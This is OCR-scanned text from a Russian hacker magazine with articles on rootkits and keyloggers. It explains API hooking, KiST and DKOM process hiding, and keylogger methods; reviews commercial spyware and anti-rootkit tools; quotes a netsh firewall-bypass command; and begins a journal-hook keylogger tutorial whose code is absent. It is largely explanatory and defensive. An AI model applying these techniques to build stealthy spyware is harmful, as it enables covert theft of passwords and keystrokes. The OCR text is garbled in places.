имя пользователя и пароль, должны рассматри- 
ваться, как подозрительные. Никогда не стоит вво- 
дить важные данные в форму, если соединение с 
сайтом He зашифровано по стандарту SSL (https://). 

Успешно бороться с фишингом, как и с многи- 
ми другими киберугрозами, можно, используя ком- 
плекс мер. На должном уровне должна быть орга- 
низована фильтрация спам-сообщений и вовремя 
должно производиться обновление программного 
обеспечения, а пользователи должны помнить об 
опасности совершения каких-либо предлагаемых 
им итераций. Если сообщение уж очень похоже на 
подлинное, то всегда возможно отправить запрос о 
подтверждении его подлинности у первоисточника. 
В этом случае надо помнить о том, что ссылку на 
сайт в браузере или адрес в строке «кому» в сооб- 
щении нужно вводить вручную, а после загрузки 
страницы сайта убедиться в том, что ссылка в стро- 
ке браузера не изменилась. 

Довольно распространено мнение, что реше- 
ния по защите от спама, работающие только на 
распознавание спам-техник, не спасают от фишин- 
говых атак. Возможно, здесь больше могут помочь 
продукты и сервисы, позволяющие фильтровать 
сообщения электронной почты, основываясь на |Р- 
адресах источника рассылки. Что касается защи- 
ты от фарминга, то здесь относительную полез- 
ность могут оказать сами интернет-браузеры. На- 
пример, Internet Exporer 7 и Mozilla Firefox 2 содер- 
жат в себе встроенные технологии, блокирующие 
подозрительные сайты до загрузки или преду- 
преждающие пользователя об опасности © 
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> история возникновения руткитов. Бытует 
мнение, что руткиты появились в последние нес- 
колько лет. Это, естественно, не так: идея руткита 
известна уже более десяти лет. Все началось еще 
во времена MS DOS — тогда большинство ком- 
пьютерщиков были достаточно опытными и могли 
на глаз обнаружить появление вируса в системе по 
модификации размеров файлов. Следовательно, 
вирусописателям пришлось применять активные 
меры для маскировки своих детищ — и на свет по- 
явились так называемые стелс-вирусы (от англ. 
Stealth — невидимка). Таким образом, возникает 
вопрос: какая связь между вирусом (тем более 
древним) и руткитом? Ответ прост: они применяют 
совершенно идентичные методики. Во времена М$ 
DOS аналогом АР!-функций были прерывания — 
следовательно, возникало два пути маскировки: 

1 Перехват прерывания стандартным методом, 
путем модификации адреса в таблице прерываний. 

2 Модификация машинного кода прерывания. 

Для борьбы с такими «руткитами» существо- 
вали специальные средства, работа которых сво- 
дилась к поиску и снятию перехватчиков прерыва- 
ний, а также к прямому чтению диска. Последний 
метод активно применялся в ревизорах. 


БОЕВОЕ 
КРЕЩЕНИЕ 


40 ЧИТАЙ ПО РУКАМ 
46 В ПРЯТКИ С БОНДОМ 


52 ПОД НАБЛЮДЕНИЕМ 
56 ДЕТИ ШПИОНОВ 


враг 
неведом 


РУТКИТЫ И АНТИРУТКИТЫ — КТО КАК ПРОГРАММИРУЕТ, 
ИКТО КАК ВОЮЕТ 


РУТКИТЫ В НАСТОЯЩЕЕ ВРЕМЯ ЯВЛЯЮТСЯ ДОСТАТОЧНО МОДНОЙ И ПОПУЛЯРНОЙ 
ТЕХНОЛОГИЕЙ. РУТКИТ-МАСКИРОВКУ ПРИМЕНЯЮТ ВСЕВОЗМОЖНЫЕ ЗЛОВРЕДЫ 

И ШПИОНСКИЕ ПРОГРАММЫ. В ЭТОЙ СТАТЬЕ МЫ РАССМОТРИМ ИХ ВИДЫ, ПОКОВЫРЯЕМСЯ 
ВИХ ИСХОДНОМ КОДЕ И ОЦЕНИМ ПРОГРАММЫ, ПРИЗВАННЫЕ С НИМИ БОРОТЬСЯ 


http://www.z-oleg.com/secur) 


+> _user-Mode руткиты. Работающие в UserMode 
руткиты, по моей статистике, наиболее распро- 
странены и многочисленны. На то есть несколько 
причин, основные из которых — возможность ра- 
боты под Win9x и МТ, простота разработки и от- 
ладки. Подобные руткиты можно писать практиче- 
ски на любом языке (даже на встроенном в офис 
бейсике). По принципу действия, руткиты UserMo- 
de можно разделить на несколько типов: 


— РУТКИТЫ, МОДИФИЦИРУЮЩИЕ 
МАШИННЫЙ КОД ПОРАЖАЕМОЙ 
ПРОГРАММЫ. ЭТО ДОВОЛЬНО 
ЭКЗОТИЧЕСКИЙ ВИД, РАБОТА 
КОТОРОГО ОСНОВАНА НА АНАЛИЗЕ 
МАШИННОГО КОДА ПРОГРАММЫ 
И ВНЕСЕНИИ В НЕГО МОДИФИКАЦИЙ. 


~~ МОДИФИЦИРУЮЩИЕ ТАБЛИЦЫ ИМПОРТА. 


— МОДИФИЦИРУЮЩИЕ МАШИННЫЙ КОД 
АР!-ФУНКЦИЙ. 
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Программа DLL 
Таблица Таблица 
импорта экспорта 
Код, вызывающий АР! Код функций 
ee 
Rootkit 
] 
Kernel32.dll 
LoadLibrary Функция-перехватчик 
GetProcAddress 
Схема руткита, основанного на модификации таблицы импорта 
Программа DLL 
Таблица Таблица 
импорта экспорта 
Код, вызывающий АР! Код функций 


Kernel32.dll 
LoadLibrary 
GetProcAddress 


Rootkit 


Функция-перехватчик К 


Схема руткита, основанного на модификации машинного кода АР! функций 


> руткиты, модифицирующие машинный код 
поражаемой программы не получили широкого 
распространения. Их принцип действия основан 
на том, что вместо перехвата АР!-функций моди- 
фицируется машинный код поражаемой програм- 
мы. Естественно, что для реализации данного ме- 
тода разработчик руткита должен предваритель- 
но изучить поражаемую программу, выбрать ме- 
ста для модификации и внедрения кода и подгото- 
вить сигнатуры, которые впоследствии позволят 
руткиту найти нужные фрагменты машинного ко- 
да и модифицировать их. Данный метод неприме- 
ним для глобального перехвата, но с успехом мо- 
жет применяться для внедрения перехватчиков в 
некую заранее известную программу. 


> — руткиты, основанные на модификации та- 
блицы импорта. По статистике, это одна из самых 
распространенных разновидностей. Теорию и 
практический пример установки подобного перех- 
вата был в свое время подробно описан в книге 
Рихтера. Суть метода сводится к тому, что у РЕ 
имеется таблица импорта, содержащая адреса ста- 
тически импортируемых функций. Следовательно, 
руткит может найти эту таблицу в памяти, просмо- 
треть ее и подменить адреса интересующих его 
функций адресами собственных перехватчиков. 

На схеме показан принцип действия подоб- 
ного руткита. На стадии загрузки исполняемого 
файла загрузчик заполняет таблицу импорта пра- 
вильными адресами. Далее вмешивается руткит и 


подменяет реальные адреса функций адресам 
своих перехватчиков. Важным моментом является 
перехват функций LoadLibrary и GetProcAddress из 
kernel32.dll — грамотно построенный руткит обя- 
зан это сделать для того, чтобы отслеживать за- 
грузку библиотек и подменять адреса перехвачен- 
ных функций в момент их запроса. Однако анализ 
многих простейших УзегМоде-руткитов показыва- 
ет, что они это не делают и ограничиваются ис- 
ключительно правкой таблицы импорта. Это, есте- 
ственно, некорректно, но в простейшем случае ра- 
ботает — например, для маскировки процесса от 
штатного таск-менеджера. При вызове статически 
импортируемой функции программа просто пере- 
даст управление по адресу из таблицы импорта, а 
в случае динамического импорта руткит подсунет 
программе адрес своего перехватчика вместо ад- 
реса функции. Следует учитывать, что при таком 
перехвате все равно остается вероятность того, 
что программа как-то ухитрится узнать правиль- 
ный адрес (он может быть определен до установки 
перехватчиков, получен анализом заголовков би- 
блиотек ит.п.). Этого недостатка лишен метод мо- 
дификации машинного кода. 

>  руткиты, основанные на модификации ма- 
шинного кода АР!-функций. Данный метод доста- 
точно прост: он основан на модификации машин- 
ного кода перехватываемых функций в памяти. 
В простейшем случае модификация сводится к за- 
писи команды JMP в начале функции. 

По принципу реализации подразделяется на 
три разновидности: 

1 Метод подмены первых байт. Это самый 
простой и самый некорректный метод, который 
состоит в лобовом копировании первых байт 
(именно байт, а не команд) кода функции и записи 
на их место собственного кода. Обычно копируют- 
ся первые 5 байт, а на их место записывается ЕВ 
хх XX хх хх — код команды UMP. Для вызова перех- 
ваченной функции руткит вынужден восстановить 
ее, вызвать, а затем опять прописать свой код в 
начало функции. Это медленно, коряво и чревато 
глюками в многопоточном приложении. 

2 Метод подмены первых команд. Этот ме- 
тод аналогичен предыдущему, но намного кор- 
ректнее. Он состоит в том, что руткит применяет 
дизассемблер длин команд, что позволяет ему вы- 
делить несколько команд и скопировать их в бу- 
фер. Скопированные команды дополняются ко- 
мандой JMP на первую неповрежденную команду 
перехваченной АР!-функции, а занимаемой буфе- 
ром памяти выставляются фланги PAGE_EXECU- 
TE_READWRITE, что позволяет исполнять содер- 
жащийся там код. В момент вызова АР!-функции 
управление передается перехватчику руткита, а 
он, в свою очередь, может вызвать перехвачен- 
ную функцию, передав управление буферу. На 
схеме показано внедрение кода в начало функ- 
ции, это самый распространенный метод. Кроме 
того, код можно внедрить в конец функции — та- 
кой метод удобен для маскировки перехвата. Кор- 
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ректный руткит должен не просто выделять и ко- 
пировать команды — он еще должен изучать их и 
при необходимости корректировать относитель- 
ные адреса с учетом нового местоположения ко- 
пируемых команд в памяти. 

3 Метод сигнатурного внедрения. Данный ме- 

тод основан на том, что многие системные библио- 
теки почти не меняются от версии к версии. Следо- 
вательно, разработчик руткита может выбрать лю- 
бое подходящее место для внедрения своего кода 
и затем динамически искать его при помощи сиг- 
натур. Данный метод позволяет не только вне- 
дрять код в любую точку функции, но и произво- 
дить вмешательство в работу функций без их явно- 
го перехвата путем патча машинного кода. 
3» — Кете-Мочде руткиты менее распространены 
(примерно на 5-10 руткитов UserMode приходится 
один KernelMode), однако их возможности гораздо 
шире. Главный плюс подобного руткита — гло- 
бальное воздействие на систему. По принципу 
действия, их можно классифицировать на нес- 
колько категорий: 

1На основе правки адресов в KiST. Это са- 
мый распространенный метод перехвата, сводя- 
щийся к поиску таблицы KiST в памяти и правке 
адреса одной или нескольких функций. KiST раз- 
мещена в SDT, адрес которой экспортируется 
ядром, так что это почти документированный ме- 
тод перехвата. Описание методики перехвата с 
примерами можно найти в книге Свена Шрайбера 
«Недокументированные возможности Windows 
2000». 

2 Модификация машинного кода перехваты- 
ваемых функций. Метод полностью аналогичен 
модификации машинного кода в UserMode. 

3 Перехват вектора INT 2Е и sysenter. Подоб- 
ный перехват позволяет разом взять вызовы всех 


функций под контроль, что бывает удобно для гло- 
бального мониторинга системы. 

4 Драйвер-фильтр. Основан на фильтрации 
IRP и применяется чаще всего для маскировки 
файлов на диске. 

В остальном (кроме метода перехвата функ- 
ции и работы в RingO) функционирование Kernel- 
Mode руткита принципиально не отличается от Us- 
erMode — все тот же перехват функции для мони- 
торинга ее работы и модификации входных пара- 
метров или результатов работы функции. 

ОКОМ, или как замаскироваться без перех- 
ватов. ОКОМ-руткиты (DKOM расшифровывается 
kak Direct Kernel Object Manipulation) основаны на 
TOM, что вместо перехвата функций они манипули- 
руют объектами ядра в памяти. Это позволяет, в 
частности, достаточно эффективно маскировать 
запущенные процессы и загруженные библиотеки. 

Наиболее популярной и известной реализа- 
цией ОКОМ-технологии является ЕУ-руткит и его 
многочисленные клоны. Рассмотрим подробнее 
одну из наиболее простых задач — маскировку 
процесса. Маскировка процесса основана на том, 
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Таким образом, в момент инициализации драйве- 
ра идет заполнение двух переменных: ActivePro- 
cessLinkOffset и PIDOffset. Переменная ActivePro- 
cessLinkOffset содержит смещение от начала 
структуры EPROCESS до указателей на предыду- 
щую/последующую структуры, a PIDOffset — сме- 
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CESS текущего процесса. Далее мы производим 
обход цепочки структур EPROCESS до достижения 
одного из двух событий — обнаружения EPRO- 
CESS маскируемого процесса или завершения об- 
хода всей цепочки и возврата к ее началу. При об- 


Возникает вопрос: можно ли найти замаскирован- 
ный таким образом процесс? Для данного пример 
ответ однозначен — можно! Известно несколько 
наиболее распространенных метода поиска: 

1 Метод «лобового перебора». Сводится 
к циклу перебора PID от нуля до некоего большого 
числа с попыткой открыть процесс или получить 
список его библиотек по PID. Метод будет рабо- 
тать, но его корявость оставим без комментариев. 

2 Метод «косвенных признаков». Сводится 
к тому, что, к примеру, можно найти открытые 
процессом хендлы, обнаружить хендл процесса 
среди принадлежащих с$г$$5.ехе-хендлов про- 
цессов, найти принадлежащие процессу окна и 
т.п. Естественно, разработчики руткитов могут 
бороться с этим. 

з Метод «мониторинга API». Этот метод CBO- 
дится к тому, что скрытый процесс должен что-то 
делать. Следовательно, отслеживая все опера- 
ции в системе можно обнаружить активность 
процесса-невидимки. 

4 Метод «мониторинга запуска». Сводится к 
установке драйвера, который прописан как ВООТ, 
и с момента загрузки мониторит запуск и завер- 
шение процессов. 

Для желающих поэкспериментировать 
с поиском скрытых процессов могу порекомен- 
довать утилиту Process Hunter (автор — Ms-Rem, 
http://www.wasm.ru/pub/21/files/phunter.rar) и статью 
«Обнаружение скрытых процессов», которую 
можно найти на мазт.ги, а для желающих по- 
глубже изучить маскировку по ОКОМ-методике 
я советую покопаться в исходника FU Rootkit по- 
следней версии. 
> = антируткиты. Итак, мы поговорили о техно- 
логии руткитов — теперь нужно вспомнить про ан- 
тируткиты. Все антируткиты можно разделить на 
две категории: 

1 Детекторы. Задача такой программы — об- 
наружение следов присутствия руткита в системе. 

2 Детекторы-нейтрализаторы. Программы 
данного класса не просто детектируют наличие 
перехвата или модификаций машинного кода, но 
и обладают способностью к активному противо- 
действию. Противодействие может сводиться 
к восстановлению модифицированной руткитом 
таблицы импорта и KiST и восстановлению моди- 
фицированного машинного кода. Программы это- 
го класса являются «палкой о двух концах», по- 
скольку все известные на данный момент анти- 
руткиты не различают «хорошие» и «плохие» пе- 
рехваты. В результате антируткит может запро- 
сто отключить антивирусный монитор или проак- 
тивную защиту © 


Антируткит BlackLight 
разработан компанией 
F-Secure и уже доста- 
точно длительное вре- 
мя находится в стадии 
бета-тестирования. 
Скачать его можно по 
адресу http://www.f-secu- 
re.com/blacklight/, утили- 
та работает без инстал- 
ляции. Принцип поиска 
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руткитов основывается 
на низкоуровневом 
анализе системы для 
выявления маскируе- 
мых процессов и фай- 
лов. Несомненный 
плюс — способность 
поиска маскирующихся 
процессов, которая по- 
стоянно совершенству- 
ется. 


[Le 


4/5 AVZ He является спе- лизация руткита CBO- 3/5 

циализированным ан- дится к восстановле- 
АУ2 тируткитом, но тем не нию поврежденного BlackLight 
менее содержит сред- программного кода и 
ства поиска и нейтра- модификаций KiST. blackliaht 
лизации основных раз- Кроме того, в ходе по- 
новидностей руткитов: иска руткитов произво- 

UserMode и KernelMo- дится поиск скрытых 

де. Данные о найден- процессов по несколь- 

ных перехватчиках вно- “ким типовым методи- 

сятся в протокол с по- кам. Ограничение: не 

ясняющей технической — детектирует маскиров- 

информацией, в част- ку файлов при помощи 

ности с адресами пе- драйвера-фильтра. 

рехватчиков. Нейтра- 

a ный 

ее 

ще м er = 3/5 
5/5 Антируткит RootkitRe- естре, полученной ny- SSV 

vealer Марка Руссино- тем прямого их чтения 
RootkitRevealer вича можно скачать и запрошенного через 
с сайта www.sysinter- API. Если руткит ма- 


size: 210 Кб] 


nals.com/. Принцип pa- 
боты — сравнение ин- 
формации о диске и ре- 


скирует объекты на 
диске и ключи в реес- 
тре, то возникнут рас- 
хождения, которые Ro- 
otkitRevealer зафикси- 
рует в протоколе. Ути- 
лита работает доста- 
точно быстро, однако 
возможности ее огра- 
ничены — если руткит 
не маскирует свои 
файлы и ключи рее- 
стра, то RootkitRevealer 
его не обнаружит. До- 
стоинство — детекти- 
рует маскировку неза- 
висимо от применяе- 
мой методики. 


Антируткит SSV явля- 
ется бесплатным про- 
дуктом, автор — Joan- 
na Rutkowska, извест- 
ная по сайту root- 
КИ.сот. Сайт програм- 
мы — http://invisi- 
blethings.org, pasmep — 
около 50 Кб, инсталля- 
ции не требует. Утили- 
та SSV формирует 
очень информативные 
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способностью нейтра- 
лизации руткитов. Эту 
утилиту можно посове- 
товать только опытно- 
му пользователю. 
Ограничение: в ходе 
нейтрализации не де- 
тектирует маскировку 
процессов, равно как 
иА\/7 не делает раз- 
личия между «полез- 
ными» и «вредными» 


протоколы и обладает перехватчиками. 
= 6 шо = O——#8 Se фреш к 
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Клавиатурные шпионы (кейлоггеры) — образуют 
большое семейство зловредных программ для 
шпионажа за работой пользователей. Первые кей- 
логгеры появились еще во времена MSDOS — тог- 
да они представляли собой обработчики прерыва- 
ния клавиатуры размером около 1 Кб. Однако функ- 
ции кейлоггера за прошедшее время не измени- 
лись — по-прежнему его первичной задачей явля- 
ется скрытая регистрация клавиатурного ввода с 
последующей записью собранной информации на 
диск или передачей по сети. 

Кейлоггер представляет большую угрозу 
для безопасности пользователя. С точки зрения 
антивируса, это не вирус и не троянская програм- 
ма, поэтому многие антивирусные пакеты если и 
ловят кейлоггеры, то только с расширенной базой. 
Другая проблема связана с тем, что кейлоггеров 
известно великое множество, да и написать его не 
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составляет особого труда — как следствие, сигна- 
турный поиск против них малоэффективен. 

> = основные принципы построения кейлоггера. 
Рассмотрим основные принципы, которые исполь- 
зуют (или могут потенциально использовать) кла- 
виатурные шпионы. 

1 Стандартная клавиатурная ловушка. Это 
самый распространенный метод: состоит в уста- 
новке ловушки Tuna WH_KEYBOARD. Код ловушки 
должен размещаться в DLL, которая проецируется 
в адресное пространство @\-процессов по мере 
необходимости. Понятное дело, что эта библиоте- 
ка весьма заметна и позволит следить только за 
GUI-npoueccamn. 


Pate rear . 


2 Ловушка Tuna WH_JOURNALRECORD. Ee 
отличие от WH_KEYBOARD состоит в том, что код 
ловушки может располагаться в приложении, уста- 
новившем ловушку, — как следствие, не требуется 
таскать DLL. Метод имеет некоторые особенности, 
которые мы рассмотрим далее на примере. 

з Периодический опрос состояния клавиату- 
ры. Примитивный до безобразия метод, состоящий в 
циклическом опросе состояния клавиатуры с боль- 
шой скоростью. Как ни странно, но этот метод приме- 
нятся даже некоторыми коммерческими продуктами. 

4 Установка драйвера-фильтра. Этот ме- 
тод, равно как и ловушка, является документиро- 
ванным методом слежения за клавиатурным вво- 


дом. Фильтр подключается к стеку клавиатуры при 
помощи loAttachDevice, а подключение обычно ве- 
дется к \\Вемсе\\КеубоагаС!а$$0. Фильтр отлавли- 
вает IRP tuna IRP_MJ_READ и устанавливает в них 
свою процедуру завершения при помощи функции 
loSetCompletionRoutine. 

5Подмена клавиатурного драйвера. Метод 
неприемлем для коммерческого кейлоггера, так 
как его создатели не могут знать заранее, какого 
типа клавиатура применяется на ПК пользователя. 

в Шпион-руткит. Может реализовываться как 
в UserMode, так и в режиме ядра. В UserMode cne- 
жение за клавиатурным вводом может быть постро- 
ено за счет перехвата обмена процесса csrss.exe 


15% циклический опрос 


13% простейшие rootkit UserMode| 


Сверху: принципы работы кейлоггеров 
Внизу: технологии кейлоггеров 


драйвером клавиатуры или при помощи слежения 
за вызовами АР!-функций типа GetMessage и Pe- 
ekMessage. В KernelMode классическим методом 
является поиск KeServiceDescriptorTableShadow и 
перехват в ней ряда функций, в частности Реек- 
Message. У руткита есть еще одно преимущество: 
он может перехватить еще 2-3 функции для ма- 
скировки. Самое смешное состоит в том, что от 
руткита-кейлоггера не спасает даже экранная 
клавиатура, которая часто преподносится как 
панацея от кейлоггера любого типа. Про UserMode 
и KernelMode ты сможешь прочитать в моей книге, 
которая должна выйти в конце лета. 
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7 Аппаратный «жучок». Такой кейлоггер обла- 
дает несомненным плюсом — его нельзя обнаружить 
программными методами. Развитие микроэлектро- 
ники привело к тому, что стоимость такого девайса 
снизилась до $50-100, поэтому вероятность примене- 
ния такого «жучка» существенно возрастает. 
> вскрытие показало... Чтобы не быть голо- 
словным, перед написанием статьи я обследовал 65 
более или менее распространенных коммерческих 
кейлоггеров последних версий, что позволило сде- 
лать несколько интересных выводов. Первый вывод 
касается принципов работы (диаграмма сверху). 

Оказалось, что подавляющее большинство 
кейлоггеров применяет банальные ловушки и ци- 
клический опрос клавиатуры. И только порядка 
10% содержат драйвера-фильтры. Коммерческий 
руткит-кейлоггер в чистом виде так и не попался. 
Это говорит о том, что данная технология пока не 
нашла широкого распространения. С точки зре- 
ния применения руткитов (смотри на второй диа- 
грамме), картина примерно аналогична — около 
10% изученных шпионов применяют более или 
менее серьезные руткиты, достойные рассмотре- 
ния. Остальные или никак не маскируются, или 
содержат примитивнейшую защиту от диспетче- 
ра процессов (но при этом в описании буквально 
каждого можно найти громкие фразы типа «абсо- 
лютно невидим» ит.п.). 

Самым интересным, с точки зрения маски- 
ровки, оказался ELITE Keylogger 2.6, который по- 
радовал хоть какими-то нестандартными (и доста- 
точно эффективными) мерами самозащиты. 
> _ аппаратные кейлоггеры. Аппаратный кейлог- 
гер может быть установлен различным способом. 
Наиболее популярны два метода: 

1 Размещение кейлоггера внутри клавиату- 
ры. При этом обнаружить такого шпиона очень 
трудно, питаться он может непосредственно от 
платы клавиатуры. Существует достаточно ши- 
рокий ассортимент таких устройств, например 
http://www.keyghost.com/securekb.htm. 

2 Включение в разрыв кабеля. Обычно устрой- 
ство маскируется под удлинитель или фильтр — ас- 
сортимент весьма велик. Наиболее известен KEY- 
Katcher Hardware Keyloggers (http:/www.keykatcher.com/), 
который производится в двух разновидностях: для 
PS/2- и УЗВ-клавиатур. Другой пример — KeyGhost 
(http://www.keyghost.com/). 
> коммерческие программные кейлоггеры. 
Рассмотрим несколько характерных кейлоггеров 
подробнее (я специально отобрал наиболее ти- 
пичные экспонаты). Итак, начнем с отечественной 
разработки — кейлоггера Actual Spy. р 


В ЭТОЙ СТАТЬЕ МЫ РАССКАЖЕМ 0 ТОМ, КАКИЕ БЫВАЮТ КЕЙЛОГГЕРЫ, 
КАК ИХ ПИШУТ, А ТАКЖЕ - КАКИЕ БЫВАЮТ АНТИКЕЙЛОГГЕРЫ 


И КАК ИХ ВЫБИРАЮТ 
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Actual Spy 


1.5 Мб 


Данный кейлоггер 
обладает весьма вну- 
шительными возмож- 
ностями, включая сле- 
жение за браузером и 
буфером обмена. Под- 
держивает автоматиче- 
скую отправку отчетов 
по Сети. В описании за- 
явлено, что он не де- 
тектируется антивиру- 
сами, и не виден во 
всех операционных си- 
стемах. 

Исследование пока- 
зало, что, несмотря на 
функциональность, ма- 
скировка процесса у 
него отсутствует (за ис- 
ключением простей- 
шей руткит-маскировки 
от диспетчера задач 
Windows), а принцип 
действия основан на 
ловушке. Поведенче- 
ский анализатор AVZ 
показал, что ловушка 
построена по классиче- 
скому алгоритму: 


В данном протоколе 
hprog.dll — это руткит 
для маскировки про- 
цесса, а hk.dll — би- 
блиотека с ловушкой. 
Почему эти две би- 
блиотеки не объедине- 
ны в одну — не совсем 
понятно, ВИДИМО, 
Иргод.а! применяется 
только МТ-системами. 
Дальнейшее изучение 
показало, что процес- 
сы и библиотеки данно- 
го кейлоггера обнару- 
живаются любым аль- 
тернативным диспетче- 
ром процессов. Кроме 
того, в составе кейлог- 
гера есть ВАТ-файл с 
командой «netsh firewall 
add allowedprogram pro- 
gram=asmonitor.exe na- 
me=System». Выполне- 
ние данного файла 
приводит к внесению 
главного исполняемого 
файла asmonitor.exe в 
список разрешенных 
для встроенного Fi- 
rewall. 
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ELITE Keylogger 2.6 


www.widestep.com 


3 Мб] 


Этот кейлоггер облада- 
ет самой мощной рут- 
кит-защитой из всех 
исследованных. Внача- 
ле предлагает выбрать 
режим установки — по 
умолчанию применяет- 
ся режим «невидимой 
установки» (без созда- 
ния ярлыков и реги- 
страции деинсталлято- 
ра программы в «уста- 
новке и удалении про- 
грамм»). 

Шпион устанавлива- 
ет в систему три драй- 
вера. Драйвер с име- 
нем usbkbd.sys приме- 
няется для маскировки 
остальных драйверов. 
Маскировка состоит в 
перехвате функций 
ZwCreateKey, ZwEnu- 
merateKey u ZwOpen- 
Key для сокрытия клю- 
чей реестра, принадле- 
жащих драйверам кей- 
логгера. Драйвер 
extfs.sys является 
фильтром файловой 
системы и применяется 


Family Key Logger 


www.spyarsenal.com| 


для маскировки фай- 
лов кейлоггера на дис- 
ке. В сумме он прячет 
не менее 6-ти файлов. 
И, наконец, tdiip.sys — 
собственно, сам кла- 
виатурный шпион, вы- 
полненный в виде 
фильтра клавиатуры. 

Анализатор прото- 
колов предоставляет 
типичные для продук- 
тов данного класса 
функции, но обладает 
одной особенностью: у 
него имеется специаль- 
ная подсистема для ре- 
гистрации паролей, 
вводимых пользовате- 
лем (причем фиксиру- 
ются все пароли, вклю- 
чая пароль при входе в 
систему). 

Данный кейлоггер 
наиболее близок к иде- 
альному из всех иссле- 
дованных, так как у не- 
го нет процессов или 
внедренных в другие 
программы библиотек, 
а его файлы и ключи 
реестра надежно зама- 
скированы руткитом. 
Однако руткит-маски- 
ровка одновременно 
является его слабой 
стороной, поскольку 
обнаружение перехва- 
тов и посторонних 
фильтров позволяет 
заподозрить, что в си- 
стеме творится что-то 
неладное. 


Достаточно распро- 
страненный кейлоггер, 
и вописании, как всег- 
да, заявлена его абсо- 
лютная невидимость, 
однако посмотрим на 
лог AVZ: 
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Advanced Anti 
Keylogger 


ww.anti-keylogger.net 


По функциональности 
данная программа ана- 
логична PrivacyKeybo- 
ard — ее можно ска- 
чать с сайта www.anti-ke- 
ylogger.net/, объем около 
800 Кб. Принцип дей- 
ствия также основан на 
мониторинге функций 
из режима ядра. 

С точки зрения про- 
двинутого пользовате- 
ля, эта утилита гораздо 
интереснее предыду- 
щей, поскольку не про- 
сто блокирует подозри- 
тельные действия, но 
и достаточно подробно 


Pg a Pate фича] Нея ВЫП т о ЩЕ Ка осей aS RA 


о аа 


[нА Ин all 


Ba i bande реали 
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Как видно из лога, не- 
видимость налицо :). 
Причем хорошо видна 
тенденция: две библио- 
теки, так же, как и в 
ActualSpy. Ctfs.dll — 
простенький руткит 

на базе домены адреса 
в таблице импорта 
процесса, а ctfmon.dll — 
сам логгер. Причем 
если ActualSpy 
передавал данные 
своему процессу, 

то этот пишет 

их напрямую в файл 
ctfmon.txt, причем 

без кэширования. 


рассказывает о них 
пользователю. 

Сообщения весьма 
информативны — Ha- 
пример, указывается, 
какой процесс пытает- 
ся установить ловушку 
(с указанием как со- 
держащей ловушку би- 
блиотеки, так и процес- 
са, который ее устана- 
вливает). 

Пользователь может 
либо разрешить даль- 
нейшую работу клавиа- 
турного перехватчика, 
либо блокировать ее. 
Несомненным достоин- 
ством программы мож- 
но считать информа- 
тивные сообщения, вы- 
водимые в ходе обуче- 
ния — Advanced Anti 
Кеуоддег определяет 
тип перехватчика, а в 
случае с установкой 
ловушки указывает не 
только содержащую 
ловушку библиотеку, 
но и приложение, кото- 
рое пытается устано- 
вить эту ловушку. Соз- 
дание правил может 
вестись в режиме об- 
учения и сильно напо- 
минает процесс обуче- 
ния Firewall. 
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PrivacyKeyboard 


ww.bezpeka.biz} 


Программа PrivacyKey- 
board является одним 
из самых известных 
коммерческих продук- 
тов. Ее можно скачать 
с официального сайта, 
стоимость копии — 
около $90. 

Принцип действия 
программы основан на 
установке драйвера, 
производящего мони- 
торинг вызовов, приме- 
няемых кейлоггерами 
функций (перехват 
@Ч-функций произво- 
дится путем правки ад- 
ресов в KeService- 
DescriptorTableShadow 
с защитой OT снятия пе- 
рехвата за счет его пе- 
риодического восста- 
новления). Блокировка 


О 
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подозрительных дей- 
ствий производится ав- 
томатически, при этом 
есть возможность раз- 
блокировки любой про- 
граммы. 

Тестирование про- 
граммы показало, что 
она эффективно ней- 
трализует классиче- 
ские кейлоггеры на ос- 
нове ловушек, цикли- 
ческом опросе и кла- 
виатурном драйвере- 
фильтре. Руткит-кей- 
логгеры данная про- 
грамма не детектирует 
и не нейтрализует. Кро- 
ме того, сам PrivacyKe- 
убоага «немного рут- 
кит», так как он маски- 
рует свой процесс по 
ОКОМ-методике. 
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> = оттеории к практике. Рассмотрим несколько 
типовых примеров. В начале поговорим о шпио- 
не на основе ловушки, построенном без примене- 
ния DLL. Такой шпион использует ловушку типа 
WH_JOURNALRECORD, которая является систем- 
ной, то есть функция-обработчик вызывается си- 
стемой, причем в контексте потока, выполнивше- 
го установку ловушки. Практическое последствие: 
код ловушки на совершенно законных основаниях 
размещается в самой программе, а нев DLL. Это 
удобно, так как не требуется таскать лишние DLL. 
Кроме того, у хука Tuna WH_JOURNALRECORD 
есть еще один плюс: он регистрирует клавиатур- 
ные и мышиные события, что упрощает написание 
шпиона. Однако при всех плюсах есть и минусы: 
ловушка данного типа автоматом снимается си- 
стемой при нажатии CTRL+ALT+DEL и CTRL+ESC — 
шпион должен отслеживать данную ситуацию и пе- 
реустанавливать ловушку. 

Но давай по порядку. Для начала нам пона- 
добится написать две функции: InstallHook для 
установки ловушки и RemoveHook для ее удале- 
ния. Функции, по сути, являются оберткой для API- 
функций SetWindowsHookEx и UnhookWindowsHo- 
oOkEx, но дополнены проверкой, блокирующей пов- 
торную установку или удаление ловушки. Пере- 
менная HookHandle предназначена для хранения 
хендла и изначально инициализируется значени- 
em INVALID_HANDLE_VALUE. 


Следующим обязательным шагом является код, сни- 
мающий ловушку в момент завершения программы: 
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равен HC_ACTION, то Param должен интерпретиро- 
ваться как указатель на структуру EVENTMSG. Зна- 
чения HC_SYSMODALOFF и HC_SYSMODALON для 
нас не представляют интереса: они указывакт на то, 
что создано (или разрушено) модальное окно уровня 
системы. Наш обработчик их просто игнорирует. 


ИНТИМ 


СПЕЦ 10 06: В ПРОДАЖЕ С 1 ОКТЯБРЯ 
ТЕМА НОМЕРА «ИСКУССТВО ПРОГРАММИРОВАНИЯ» 


www.xakep.ru 


Работа самого хука весьма проста. Если код one- 
рации пСоде равен HC_ACTION, то производится 
анализ кода сообщения в структуре EventMsg. Для 
мышиных событий paramL этой структуры содер- 
жит координату Х-мыши на момент события, ра- 
гатН — координату У. Для клавиатурных событий 
paramL содержит коды клавиши (в старшем байте 
содержится скан-код, в младшем — виртуальный 
код), рагатН содержит счетчик повторений и приз- 
нак дополнительной клавиши в 15-м бите. 

В нашем примере при получении клавиатур- 
ного события в протокол выводится название на- 
жатой клавиши и соответствующий ей символ. Для 
определения этой информации применяются API- 
функции — GetKeyNameText и ToAscii, — которым 
в качестве параметров требуется передавать вир- 
туальный код и скан-код. Поэтому удобнее снача- 
ла получить эти коды из параметра paramL, а 3a- 
тем приступить к дальнейшим операциям. При 
этом смысл конструкции ((EventMsg’.paramL and 
$FFOO) shl 8 состоит в том, что скан-код клавиши 
должен находиться в битах 16..23. В нашем случае 
он содержится в битах 8..15 параметра paramL, по- 
этому мы сначала маскируем интересующие нас 
